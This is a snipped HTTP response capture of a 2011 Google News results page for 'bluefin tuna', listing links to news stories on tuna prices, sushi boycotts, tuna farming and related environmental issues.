Date: Thu, 03 Feb 2011 00:05:14 GMT
Expires: Thu, 03 Feb 2011 00:05:14 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 184379

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<a href="/news?pz=1&amp;cf=all&amp;ned=us&amp;ict=ln" class="persistentblue"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A " title="The Japan Times"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A "> The Japan Times </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A " href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" id="MAA4AEgAUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " title="Change.org"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw "> Change.org </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" id="MAA4AEgBUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHcMze2ae6ebOI2C3PaK6ur06hVxA " href="http://www.abc.net.au/rural/news/content/201102/s3126694.htm" id="MAA4AEgCUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " title="Journal Pioneer"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug "> Journal Pioneer </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" id="MAA4AEgDUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGsIpimsSlc6862oQxES7yIG08YKw " href="http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html" id="MAA4AEgEUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHlrZSVNM6Zz6hhcU2h9fR5HO18TQ " href="http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html" id="MAA4AEgFUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.mpbn.net/News/MaineHeadlineNews/tabid/968/ctl/ViewItem/mid/3479/ItemId/14769/Default.aspx" target="_blank" class="usg-AFQjCNGo-CB9ZWSi7CQDkz5h4dPyoFpbkA " id="MAA4AEgFUAFgAmoCdXN6AA">Feds Hear Maine Fishermen&#39;s Concerns About <b>
...[SNIP]...
<div class="aa-inner"><a href="http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html" target="_blank" class="usg-AFQjCNHJgKrjx821lalk2U6xhw6rFd8OBw " id="MAA4AEgFUAJgAmoCdXN6AA">Are Japan&#39;s fish lovers eating <b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEAs5yHkoxf5PLIbduZdvDTPNANTw " href="http://www.smh.com.au/environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html" id="MAA4AEgGUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " title="Care2.com"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg "> Care2.com </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGjeMWFHNSlwu8XejXELihMYQVcvA " href="http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html" id="MAA4AEgHUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" target="_blank" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " id="MAA4AEgHUAFgAmoCdXN6AA"><b>
...[SNIP]...
<div class="aa-inner"><a href="http://www.perishablenews.com/index.php?article=0012418" target="_blank" class="usg-AFQjCNEb2onXiwetCVbrzfC8pLeqUq_iLw " id="MAA4AEgHUAJgAmoCdXN6AA"><b>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGU4Dw__ikAvrPZ4CXmdyvVoq1ekQ " href="http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html" id="MAA4AEgHUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=s&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNGGwDZ81cCB2GkskNjd5BFz1-wQZA " title="FIS.com (Registro)"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=s&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNGGwDZ81cCB2GkskNjd5BFz1-wQZA "> FIS.com (Registro) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGEvz8wD5KFUBDRm8fyTutGxh15BA " href="http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919" id="MAA4AEgIUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.theaustralian.com.au/business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502" target="_blank" class="usg-AFQjCNHSGv6ptSe6ATRL04XhL1LAb8DP9g " id="MAA4AEgIUAFgAmoCdXN6AA">Clean Seas <b>
...[SNIP]...
<div class="aa-inner"><a href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=e&amp;special=&amp;ndb=1%20target=" target="_blank" class="usg-AFQjCNFrD2qfITwsI5Hls4kuQEAJuC4YOg " id="MAA4AEgIUAJgAmoCdXN6AA">Clean Seas cuts its financial losses</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG8ugL9cP4_P_deE4rc6bJsN-B8Cg " href="http://www.portlincolntimes.com.au/news/local/news/general/captive-tuna-spawn-again/2056995.aspx" id="MAA4AEgIUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDU8BhJeFC8fWZCb6uhT-qKM1UPQ " href="http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916" id="MAA4AEgIUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFvJ5WUoobkuCPj9ljljw0mWx5tJg " href="http://sj.farmonline.com.au/news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx" id="MAA4AEgIUAVgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ " title="Opposing Views"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ "> Opposing Views </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ " href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" id="MAA4AEgJUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.emagazine.com/view/?5489" target="_blank" class="usg-AFQjCNHLfbvmdTXC_JFpoj9By0s9_ZrFJg " id="MAA4AEgJUAFgAmoCdXN6AA">More Sustainable Sushi</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html" target="_blank" class="usg-AFQjCNFSHqxzZNorv-GD6GRevN8tf1VjUw " id="MAA4AEgJUAJgAmoCdXN6AA">David E. Preble: Parisian <b>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUzQytF4YUm3hkyaxnBn6FMo51QQ " href="http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren" id="MAA4AEgJUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGbM6wrHBqq9Iz3qod7D0OxahPBPQ " href="http://food.change.org/blog/view/bluefin_brigade_to_the_rescue" id="MAA4AEgJUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFgg6TzF0vDdzqoj-Hg6p_dX--3jg " href="http://cnews.canoe.ca/CNEWS/Environment/Suzuki/2011/01/18/16940341.html" id="MAA4AEgKUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979" target="_blank" class="usg-AFQjCNHX59xpWXbvg3fyXLkYwUCR1S5vuw " id="MAA4AEgKUAFgAmoCdXN6AA">World of Mouth: Tunarama!</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html" target="_blank" class="usg-AFQjCNGSOsUWp9b0dGDt-SyTBDvQXCneOA " id="MAA4AEgKUAJgAmoCdXN6AA">World-renowned Chefs Join Call to Boycott <b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG2-iG7R684r1nozJ4ewcSV6P-fqw " href="http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/" id="MAA4AEgLUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/" target="_blank" class="usg-AFQjCNHorcaXaj6CgrvEd-2rU2qMSnAnBA " id="MAA4AEgLUAFgAmoCdXN6AA"><b>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " title="GlobalPost"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ "> GlobalPost </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" id="MAA4AEgMUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEbnuNQI9Gw-zL-cLl7x8zaWq2NGQ " href="http://www.abc.net.au/news/stories/2011/01/20/3117032.htm?section=justin" id="MAA4AEgNUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.courthousenews.com/2011/01/14/33343.htm" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " title="Courthouse News Service"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.courthousenews.com/2011/01/14/33343.htm" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw "> Courthouse News Service </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " href="http://www.courthousenews.com/2011/01/14/33343.htm" id="MAA4AEgOUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q " title="FIS"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" id="MAA4AEgPUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A " title="New York Times (blog)"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A "> New York Times (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A " href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" id="MAA4AEgQUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html" class="usg-AFQjCNEGMM76-7u-8Gi1OSETdzn7Sk9ARw " title="VietNamNet Bridge"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://english.vietnamnet.vn/en/world-news/4381/launch-of-hong-kong-ocean-park--aqua-city-.html" class="usg-AFQjCNEGMM76-7u-8Gi1OSETdzn7Sk9ARw "> VietNamNet Bridge </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFOHeTN6xxu80u2Fggr0eJMZq5-1g " href="http://www.thestandard.com.hk/news_detail.asp?we_cat=4&amp;art_id=107529&amp;sid=31063765&amp;con_type=1&amp;d_str=20110127&amp;fc=4" id="MAA4AEgRUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm" target="_blank" class="usg-AFQjCNHLtx-zlG_bsYbqz7VY3aNvcI2WkQ " id="MAA4AEgRUAFgAmoCdXN6AA">Ocean Park &#39;putting species at risk&#39;</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species" target="_blank" class="usg-AFQjCNFPnm0dnzgpsDQlDK1hA1hHLmgxJw " id="MAA4AEgRUAJgAmoCdXN6AA">Greens slam Hong Kong theme park for importing endangered species</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " title="FIS"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg "> FIS </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFMako-SkFocYk2ic1XDtXqYI1nUg " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40335&amp;ndb=1&amp;df=0" id="MAA4AEgSUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house" class="usg-AFQjCNEWdZD9Y7T5LGjIYEk-cJVQvX1oyQ " title="The Guardian"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="source "> <a target="_blank" href="http://www.guardian.co.uk/business/2011/jan/11/offshore-oil-industry-white-house" class="usg-AFQjCNEWdZD9Y7T5LGjIYEk-cJVQvX1oyQ "> The Guardian </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHMv3K4gAqJ5CkhAEDN_ZJQ5lnMHw " href="http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more" id="MAA4AEgTUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Oeftb-uHSaY">Video:&nbsp;
Fishermen, Businesses Beg for BP Spill Money
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html" target="_blank" class="usg-AFQjCNFziuziyKtuPUEMEPJVJt8a8dHlQA " id="MAA4AEgTUAFgAmoCdXN6AA">The Evaluation of Deepwater Horizon&#39;s Environmental Toll (Challenges of a <b>
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html" class="usg-AFQjCNHJgKrjx821lalk2U6xhw6rFd8OBw " title="The Japan Times"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " title="Care2.com"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=e&amp;special=&amp;ndb=1%20target=" class="usg-AFQjCNFrD2qfITwsI5Hls4kuQEAJuC4YOg " title="FIS"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
<div class="thumbnail" style="width:80px; padding-top:0px; padding-bottom:0px;"><a target="_blank" href="http://www.emagazine.com/view/?5489" class="usg-AFQjCNHLfbvmdTXC_JFpoj9By0s9_ZrFJg " title="E/The Environmental Magazine"><img alt="" class="" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
...[SNIP]...
